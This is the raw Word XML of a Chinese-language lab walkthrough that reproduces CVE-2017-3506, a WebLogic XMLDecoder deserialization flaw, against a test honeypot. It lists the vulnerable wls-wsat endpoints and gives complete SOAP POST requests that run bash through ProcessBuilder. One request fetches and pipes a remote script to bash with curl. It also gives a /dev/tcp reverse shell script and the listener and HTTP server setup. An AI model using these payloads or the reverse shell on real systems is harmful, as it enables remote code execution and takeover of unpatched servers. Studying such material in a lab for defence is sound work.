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利用CVE-2017-3506漏洞</w:t>
      </w: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一、测试环境说明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攻击机：windows虚拟机（安装burpsuite工具），IP地址：10.0.30.2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接收反弹shell机（作为web服务器提供反弹shell文件下载）：Linux虚拟机，IP地址：10.0.20.183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靶机：WebLogic 10.3.6.0蜜罐，IP地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.0.20.19</w:t>
      </w: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二、漏洞描述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Weblogic的WLS Security组件对外提供webservice服务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其中使用了XMLDecoder来解析用户传入的XML数据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在解析的过程中出现反序列化漏洞，导致可执行任意命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>构造请求运行weblogic中间件的主机来进行攻击。此外，还可以利用此漏洞来进行挖矿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漏洞触发位置：wls-wsat.war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漏洞触发URL：请参考漏洞验证中的漏洞点地址（POST）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漏洞的本质：构造SOAP（XML）格式的请求，在解析的过程中导致XMLDecoder反序列化漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/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三、漏洞影响版本</w:t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受影响版本：weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.0~12.2.1.2</w:t>
      </w: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四、漏洞验证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在wls-wsat包中的URI都受到影响，可以在web.xml中查看所有受到影响的URI。如下：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root@14ef3a3c7f24:/# ls /home/wls/user_projects/domains/sample/servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/WEB-INF/web.xml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91740"/>
            <wp:effectExtent l="0" t="0" r="1016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默认接收到影响的URI（漏洞点地址）：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/wls-wsat/CoordinatorPortType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/wls-wsat/RegistrationPortTypeRPC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/wls-wsat/ParticipantPortType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/wls-wsat/RegistrationRequesterPortType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/wls-wsat/CoordinatorPortType11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/wls-wsat/RegistrationPortTypeRPC11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/wls-wsat/ParticipantPortType11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/wls-wsat/RegistrationRequesterPortType11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在WEB浏览器上输入以下网址，如下：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color w:val="auto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u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://10.0.20.19:7001/wls-wsat/CoordinatorPortType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5420" cy="1259205"/>
            <wp:effectExtent l="0" t="0" r="1143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我们发现就是这个页面存在漏洞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五、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/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方法1、利用Burp Suite工具进行漏洞入侵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1、利用Burp Suite工具截获web services页面的HTTP报文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访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://10.0.20.19:7001/wls-wsat/CoordinatorPortType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，如下：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1156335"/>
            <wp:effectExtent l="0" t="0" r="5715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5420" cy="2486025"/>
            <wp:effectExtent l="0" t="0" r="1143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2、修改HTTP Request请求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4150" cy="2635885"/>
            <wp:effectExtent l="0" t="0" r="12700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3370580"/>
            <wp:effectExtent l="0" t="0" r="3810" b="12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POST /wls-wsat/CoordinatorPortType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HTTP/1.1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Host: 10.0.20.19:7001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Upgrade-Insecure-Requests: 1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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9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Accept-Encoding: gzip, deflate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Accept-Language: zh-CN,zh;q=0.9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Cookie: ADMINCONSOLESESSION=4fhKjv7B6J0YYfGkbHFTWhZwnYL2400ppnLhvMJKVvh3WnL7YdWv!-156810473; JSESSIONID=qkWgjlvWLLdkH6vLVLPzz5JT7PsWfHZPGv1qtT1MwjKNJBCJcJqW!-295287323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Content-Type: text/xml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Connection: close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&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"&gt;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&lt;soapenv:Header&gt;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&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;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&lt;java&gt;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&lt;object class="java.lang.ProcessBuilder"&gt;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&lt;array class="java.lang.String" length="3"&gt;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&lt;void index="0"&gt;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&lt;string&gt;/bin/bash&lt;/string&gt;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&lt;/void&gt;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&lt;void index="1"&gt;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&lt;string&gt;-c&lt;/string&gt;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&lt;/void&gt;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&lt;void index="2"&gt;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&lt;string&gt;touch /tmp/success&lt;/string&gt;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&lt;/void&gt;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&lt;/array&gt;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&lt;void method="start"/&gt;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&lt;/object&gt;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&lt;/java&gt;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&lt;/work:WorkContext&gt;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&lt;/soapenv:Header&gt;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&lt;soapenv:Body/&gt;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&lt;/soapenv:Envelope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="auto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u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>需要留2个回车换行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由于该漏洞不回显，我们可以通过dnslog平台或者向weblogic容器里面创建/tmp/success文件。如下：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960" cy="542925"/>
            <wp:effectExtent l="0" t="0" r="889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3、在反弹shell机上启动http服务端提供反弹shell文件下载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1）准备反弹shell文件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[root@localhost ~]# mkdir weblogic_reverse_shell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[root@localhost ~]# cd weblogic_reverse_shell/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[root@localhost weblogic_reverse_shell]# cat reverse_shell.sh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#!/bin/bash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bash -i &gt;&amp; /dev/tcp/10.0.20.183/44444 0&gt;&amp;1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2）在反弹shell机上启用http服务端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[root@localhost ~]# cd weblogic_reverse_shell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[root@localhost weblogic_reverse_shell]# python3 -m http.server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511175"/>
            <wp:effectExtent l="0" t="0" r="5715" b="31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810125" cy="2447925"/>
            <wp:effectExtent l="0" t="0" r="952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3）在反弹shell机上监听44444/tcp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248150" cy="962025"/>
            <wp:effectExtent l="0" t="0" r="0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4、在windows测试机上利用burpsuite工具修改http request请求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4310" cy="3362960"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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POST /wls-wsat/CoordinatorPortType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HTTP/1.1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Host: 10.0.20.19:7001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Upgrade-Insecure-Requests: 1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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9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Accept-Encoding: gzip, deflate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Accept-Language: zh-CN,zh;q=0.9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Cookie: ADMINCONSOLESESSION=4fhKjv7B6J0YYfGkbHFTWhZwnYL2400ppnLhvMJKVvh3WnL7YdWv!-156810473; JSESSIONID=qkWgjlvWLLdkH6vLVLPzz5JT7PsWfHZPGv1qtT1MwjKNJBCJcJqW!-295287323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Content-Type: text/xml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Connection: close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&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"&gt;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&lt;soapenv:Header&gt;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&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;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&lt;java&gt;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&lt;object class="java.lang.ProcessBuilder"&gt;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&lt;array class="java.lang.String" length="3"&gt;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&lt;void index="0"&gt;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&lt;string&gt;/bin/bash&lt;/string&gt;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&lt;/void&gt;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&lt;void index="1"&gt;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&lt;string&gt;-c&lt;/string&gt;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&lt;/void&gt;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&lt;void index="2"&gt;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&lt;string&gt;curl http://10.0.20.183:8000/reverse_shell.sh | bash&lt;/string&gt;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&lt;/void&gt;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&lt;/array&gt;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&lt;void method="start"/&gt;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&lt;/object&gt;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&lt;/java&gt;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&lt;/work:WorkContext&gt;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&lt;/soapenv:Header&gt;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&lt;soapenv:Body/&gt;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highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;/soapenv:Envelope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="auto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u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>需要留2个回车换行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5、查看反弹shell是否连接成功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2372360"/>
            <wp:effectExtent l="0" t="0" r="8255" b="889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方法2、利用python脚本进行漏洞入侵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408305"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1079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请参考：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://www.freebuf.com/articles/web/272835.html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https://blog.csdn.net/he_and/article/details/90582262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2E92AB"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FD2E92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EF02515"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1EF025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jMTg3NWU1MDA0MGFiZGQ4NTY4Y2U1MDA5ZDJiODcifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="58575EA6"/>
    <w:rsid w:val="02D02404"/>
    <w:rsid w:val="04EA0838"/>
    <w:rsid w:val="09262EE7"/>
    <w:rsid w:val="0A9F0F85"/>
    <w:rsid w:val="0ECB0358"/>
    <w:rsid w:val="0FED7673"/>
    <w:rsid w:val="127F796F"/>
    <w:rsid w:val="14DE33EF"/>
    <w:rsid w:val="150E67AC"/>
    <w:rsid w:val="179B227A"/>
    <w:rsid w:val="1B2C67C4"/>
    <w:rsid w:val="1B737AC7"/>
    <w:rsid w:val="1DEC6E7F"/>
    <w:rsid w:val="238D7D26"/>
    <w:rsid w:val="23946F17"/>
    <w:rsid w:val="240E2F56"/>
    <w:rsid w:val="242C58CF"/>
    <w:rsid w:val="25095534"/>
    <w:rsid w:val="26102B82"/>
    <w:rsid w:val="29D34718"/>
    <w:rsid w:val="29ED516F"/>
    <w:rsid w:val="2A7325D1"/>
    <w:rsid w:val="2AEF1CC4"/>
    <w:rsid w:val="2CD327F6"/>
    <w:rsid w:val="2DD869C4"/>
    <w:rsid w:val="2E22371E"/>
    <w:rsid w:val="2E856A55"/>
    <w:rsid w:val="2EA32C82"/>
    <w:rsid w:val="2F272C09"/>
    <w:rsid w:val="30726B40"/>
    <w:rsid w:val="309078B2"/>
    <w:rsid w:val="30CF65B4"/>
    <w:rsid w:val="310463A7"/>
    <w:rsid w:val="340F1EFC"/>
    <w:rsid w:val="35592AB9"/>
    <w:rsid w:val="37143855"/>
    <w:rsid w:val="38FD4C0E"/>
    <w:rsid w:val="3CD755DD"/>
    <w:rsid w:val="3F663D66"/>
    <w:rsid w:val="41AD1D68"/>
    <w:rsid w:val="432A0C36"/>
    <w:rsid w:val="46212CAC"/>
    <w:rsid w:val="48FB093A"/>
    <w:rsid w:val="4B7324F9"/>
    <w:rsid w:val="4E89275B"/>
    <w:rsid w:val="50A5371E"/>
    <w:rsid w:val="514D28D9"/>
    <w:rsid w:val="529C38B1"/>
    <w:rsid w:val="535052F6"/>
    <w:rsid w:val="53B7712E"/>
    <w:rsid w:val="54683884"/>
    <w:rsid w:val="56C06AAE"/>
    <w:rsid w:val="57417448"/>
    <w:rsid w:val="5811716D"/>
    <w:rsid w:val="58575EA6"/>
    <w:rsid w:val="59AC38C9"/>
    <w:rsid w:val="5B8B0512"/>
    <w:rsid w:val="5DB023D6"/>
    <w:rsid w:val="5F381638"/>
    <w:rsid w:val="5F760068"/>
    <w:rsid w:val="607D6456"/>
    <w:rsid w:val="640573DA"/>
    <w:rsid w:val="673628FA"/>
    <w:rsid w:val="67F55273"/>
    <w:rsid w:val="68586CAB"/>
    <w:rsid w:val="68741ECA"/>
    <w:rsid w:val="68B158C6"/>
    <w:rsid w:val="69E1298A"/>
    <w:rsid w:val="6A0916B7"/>
    <w:rsid w:val="6C880A8C"/>
    <w:rsid w:val="6CBB4A35"/>
    <w:rsid w:val="6FF100D7"/>
    <w:rsid w:val="70467698"/>
    <w:rsid w:val="70821FBA"/>
    <w:rsid w:val="713B0720"/>
    <w:rsid w:val="719B1FFC"/>
    <w:rsid w:val="721C18EA"/>
    <w:rsid w:val="763B2E21"/>
    <w:rsid w:val="76E4157D"/>
    <w:rsid w:val="771F252B"/>
    <w:rsid w:val="78E33F24"/>
    <w:rsid w:val="7B424DF5"/>
    <w:rsid w:val="7B8C4B2A"/>
    <w:rsid w:val="7DD4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4.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.emf"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin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748</Words>
  <Characters>4076</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4186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2021-07-13T06:30:00Z</dcterms:created>
  <dc:creator>Smallboy</dc:creator>
  <cp:lastModifiedBy>xyj</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-09T06:41:09Z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0C0B0BD2777D43079663A75E675A9122</vt:lpwstr>
  </property>
</Properties>
</file>